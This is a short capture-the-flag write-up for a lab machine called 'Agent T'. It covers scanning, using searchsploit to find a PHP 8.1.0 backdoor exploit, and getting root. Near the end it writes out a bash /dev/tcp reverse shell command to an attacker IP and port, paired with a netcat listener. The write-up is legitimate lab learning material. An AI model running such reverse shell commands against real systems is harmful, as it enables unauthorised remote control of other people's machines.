Agent T

Agent T

Non Spoiler Nudge

  1. Check your NMAP scan closely or Get Wappalyzer
  2. Searchsploit will help

Attack Path

  1. PHP
  2. Bash Rev Shell

Well it looks like we are only working with one port. Let's head to the interwebs and check it out.

Looks like a dashboard for a web app. Cool but it seems like nothing really works. Source code doesn't really show anything either. To the Fuzzers we go!

Okay, since our fuzzing didn't show anything we kind of have to start poking around on the web app a little more. Let's use Wappalyzer to see what's running under the hood. Not a whole lot but let's start running these against searchsploit to see if anything pops up.

We get a hit on PHP 8.1.0. Okay cool let's grab this .py and see what it does.

Sweet a backdoor? This might be pretty cool.

Doesn't look like it's doing anything to crazy let's run it and see if it works.

Well that was easy!

WE ARE ROOT!

Okay we are root and that is cool but like the exploit said we have a limited shell. We can still cat out the root flag and be done, however I am not satisfied. I need a real root shell before I walk away.

So, first I set up a netcat listener on port 6666 Next I started trying out different shells to send back to me. The one below worked beautifully!

On the target machine:

echo "bash -i >& /dev/tcp/10.14.25.127/6666 0>&1" > shell.sh

chmod +x shell.sh

bash ./shell.sh

As you can see we get a full root shell on our listener! Now.....

WE ARE ROOT!!!

Hope you enjoyed! Happy Hacking!